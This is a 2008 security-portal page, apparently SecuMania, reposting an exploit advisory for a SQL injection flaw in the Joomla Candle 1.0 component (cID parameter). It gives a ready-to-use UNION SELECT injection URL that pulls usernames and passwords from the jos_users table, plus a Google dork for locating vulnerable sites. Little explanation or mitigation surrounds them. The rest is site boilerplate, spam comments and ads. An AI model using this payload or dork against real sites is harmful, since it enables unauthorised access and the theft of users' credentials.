Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

advertise with us

add your link here only ($10/month)

Google PageRank Checker
 

Recommended Links

Most downloaded

Latest Comments

thanks smiley
莆田SEO www.0594seo.com.cn 莆田SEM搜索引擎优化营销 www.ptsem.org.cn
hi webmaster,plz help me to find any information about account harvesting and traversal path attack ...
[…] self-propagating malware in the first place. Share this post: email it! | bookmark it! | digg ...
Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...
good job you are the best . mgharba talmout :d
Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...
Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...
Current version of script corrected. Security patch available to registered users in the user foru...
But i think to protect the password is not needed because it's not used in the SQL-Execute statement...

Who's Online

Total: 7
Members: 0 / Guests: 7
No members online

Packet Storm

Packet Storm Last 10 Exploits
Packet Storm Last 10 Advisories
Packet Storm Last 10 Tools
Packet Storm Last 10 Miscellaneous Files
Packet Storm Headlines

Links

viralcoders

lzer
Visits today: 574
Visits yesterday: 911
Visits month: 19668
Visits total: 65976
Pages total: 930504
Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability Print E-mail
0
Saturday, 08 March 2008

Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability
Author: S@BUN
Date: 2008-03-08
Download: exploits , vulnerabilities , articles , Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability 

#############################################
#
########### JOOMLA com_candle SQL Injection(cid)
#
#############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
#
##DORK 1 : allinurl:"com_candle"
#
#############################################
EXPLOIT :
 
index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*
 
#############################################
################# S@BUN ####################
#############################################
######## hackturkiye.hackturkiye@gmail.com ######
#############################################
 
<mosinstall type="component" version="1.0.0">
  <name>Candle</name>
  <author>Son Vu</author>
  <creationDate>March 2007</creationDate>
  <copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>
  <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
 
  <authorEmail>sora4g@gmail.com</authorEmail>
  <authorUrl></authorUrl>
  <version>1.0.0</version>
  <description>Candle Component.</description>
 

Set as favorite
Bookmark
Email This
Hits: 172
Comments (0)add
Write comment
quote
bold
italicize
underline
strike
url
image
quote
quote
smile
wink
laugh
grin
angry
sad
shocked
cool
tongue
kiss
cry
smaller | bigger

busy
 
< Prev   Next >
[ Back ]

Polls

How do you rate the SecuMania Security Portal?
 

Latest exploits

Latest vulnerabilities

Security

Spam

Viruses/Malware

Software/Programming

Linux

Microsoft

Technology

Credit Card | Savings Accounts | Car Insurance | Loans | Current Accountslinks VoteThisMovie PalKeys Hey3arab arabekia